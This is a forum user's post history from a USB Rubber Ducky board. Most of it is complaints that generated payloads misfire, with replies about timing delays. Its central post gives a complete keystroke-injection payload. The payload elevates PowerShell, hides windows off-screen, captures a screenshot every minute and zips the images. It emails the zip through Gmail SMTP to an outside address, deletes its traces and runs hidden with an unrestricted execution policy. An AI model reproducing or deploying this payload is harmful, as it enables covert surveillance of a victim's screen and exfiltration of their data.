duckyman662
-
Posts
9 -
Joined
-
Last visited
Posts posted by duckyman662
-
-
have you tried manually.
start with something simple:
DELAY 3000 GUI R DELAY 500 STRING NOTEPAD.EXE ENTER DELAY 500 STRING This is my first ducky script program ENTER
Yeah that works ok, I've had much longer delays than that though for literally every single other script and it wont work.
-
Sounds like a timing / focus / payload issue.
Follow some examples, the ducky will always type in the active window, sometimes timings are OS dependant , also payloads are usually OS dependant. Have you read the links in my signature? Read others posts in the forums - theres a lot of info there; could be information overload? start with the ducky guide and FAQs
Start with a slightly longer delay between commands, and once a script has successfully run; reduce the timings to find the optimal payload speed.
like any hacking device/ programming language practise,practise,practise.
The duck is your friend.
I did one from the ducky payload generator with the longest possible delay and it still does this..
-
I tried on fast, slow, windows, mac, nothing has worked, it just renames files, opens up random documents, in windows typically its opening notepad, on mac, it opens up random folders and renames them... Very displeased with this...
-
Also on both win/mac it just opens random files OR renames random program names/folders in Mac.
-
-
DELAY 2750
GUI r
DELAY 2750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 2750
ALT y
DELAY 2750
ENTER
ALT SPACE
DELAY 2750
STRING m
DELAY 2750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory
ENTER
STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth
ENTER
STRING $displayWidth = $displayInfo.ScreenWidth
ENTER
STRING $displayHeight = $displayInfo.ScreenHeight
ENTER
STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $image = new-object System.Drawing.Bitmap 1366 ,768
ENTER
STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight
ENTER
STRING $screen = [System.Drawing.Graphics]::FromImage($image)
ENTER
STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))
ENTER
STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));
ENTER
STRING $x++ } while ($x -ne 15);
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(''secret', 'secretpassword');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = ''secretemailhere@gmail.com''
ENTER
STRING $ReportEmail.To.Add('secretemailhere@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report'
ENTER
STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.'
ENTER
STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 2750
STRING C:\Windows\config-5077a.ps1
ENTER
DELAY 2750
ALT F4
DELAY 2750
GUI r
DELAY 2750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2750
ALT y
DELAY 2750
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 2750
STRING m
DELAY 2750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 2750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER
-
Hi sorry for the dely in my reply.
So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time.
411.
The only payload that has worked is the Hello World payload, the rest will open random files and such.
-
I created a payload through duck toolkit and I choose the e-mail options, I enter my information correctly and when I run the duck on the computer for some reason different payloads open random folders and I get no reports, I wanted screenshots sent to my e-mail several times but no luck, I tried creating different payloads but it wont work for some reason.
I drag and drop the bin file onto the SD card, insert into the ducky and put the ducky into the usb potr, but it runs really quickly despite slower delays like 30 extra seconds, proper keyboard layout (USA) and it's not working, any advice?
Ducky doesn't work at all. Just renames files and thats it.
in Classic USB Rubber Ducky
Posted
I've used
http://ducktoolkit-411.rhcloud.com/Home.jsp
I tried just one option of each of these, mixed up a couple as well, but still nothing works